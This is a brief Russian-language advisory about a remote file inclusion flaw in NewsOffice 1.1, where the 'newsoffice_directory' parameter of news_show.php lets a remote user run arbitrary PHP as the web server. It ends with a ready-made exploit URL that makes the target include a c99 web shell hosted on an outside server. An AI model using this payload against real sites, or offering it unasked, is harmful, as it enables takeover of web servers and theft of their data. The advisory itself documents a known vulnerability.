Программа: NewsOffice 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «newsoffice_directory» сценарием news_show.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

http://WwW.4RxH.CoM/NewsOffice/news_show.php? newsoffice_directory=http://rxh.freehostia.com/shells/c99in.txt?



Оставить мнение